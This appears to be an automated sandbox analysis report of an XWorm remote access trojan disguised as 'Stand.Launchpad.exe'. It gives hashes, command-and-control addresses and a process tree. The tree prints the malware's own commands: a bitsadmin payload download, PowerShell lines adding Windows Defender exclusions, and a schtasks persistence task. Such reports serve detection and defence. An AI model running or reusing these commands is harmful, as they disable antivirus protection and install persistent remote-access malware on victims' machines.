Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-05-2024 12:50

General

  • Target

    Stand.Launchpad.exe

  • Size

    140KB

  • MD5

    bec01d16b6f3c443eb3912042c1fc7f9

  • SHA1

    436c7fabff54997f2e550754edea0ae791080c9b

  • SHA256

    2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779

  • SHA512

    4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1

  • SSDEEP

    3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:40971

us3.localto.net:40971

Name1442-40971.portmap.host:40971

Attributes
  • Install_directory

    %Temp%

  • install_file

    Stand.exe

Signatures

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe
        3⤵
        • Download via BitsAdmin
        PID:2684
    • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
      "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2400
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1604
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {FBDDF939-C0E9-42DD-8638-5E66F1C17F72} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2236
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1824
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2028

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Downloader.hta

    Filesize

    893B

    MD5

    b0a6d4e05dc2225dd03902a3061a4041

    SHA1

    39c500eefbf78d7d51768edb6983c361213cb7b8

    SHA256

    05e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee

    SHA512

    96fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    810bed1af6e4d383a00283a0ce7e9a3c

    SHA1

    b1616b7b8702a12c03e75d556645a67868e86451

    SHA256

    e88c722575e03b8c55e8f3b8cbdc2bb573186906b5160b786512e746ee3039fc

    SHA512

    d9e7d1be37c4301c394886ade88cebd376ec6bf528d7bc4daaf142b5980acbac4292c0b4f0523713d5091371036510d5dc6847eda0e53fecd63e78da0bf6b56c

  • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

    Filesize

    108KB

    MD5

    d51da3fa31165f2536dddad44974af34

    SHA1

    703a62d92fbfe23611297715ca50bb82b4ff55a1

    SHA256

    9cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210

    SHA512

    3adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197

  • memory/1688-28-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

  • memory/1688-29-0x0000000001D20000-0x0000000001D28000-memory.dmp

    Filesize

    32KB

  • memory/1824-57-0x0000000000E20000-0x0000000000E40000-memory.dmp

    Filesize

    128KB

  • memory/1932-1-0x0000000000A70000-0x0000000000A98000-memory.dmp

    Filesize

    160KB

  • memory/1932-0-0x000007FEF5F43000-0x000007FEF5F44000-memory.dmp

    Filesize

    4KB

  • memory/2028-59-0x00000000001C0000-0x00000000001E0000-memory.dmp

    Filesize

    128KB

  • memory/2236-54-0x0000000000350000-0x0000000000370000-memory.dmp

    Filesize

    128KB

  • memory/2756-9-0x0000000000E40000-0x0000000000E60000-memory.dmp

    Filesize

    128KB

  • memory/2792-36-0x0000000001E90000-0x0000000001E98000-memory.dmp

    Filesize

    32KB

  • memory/2792-35-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB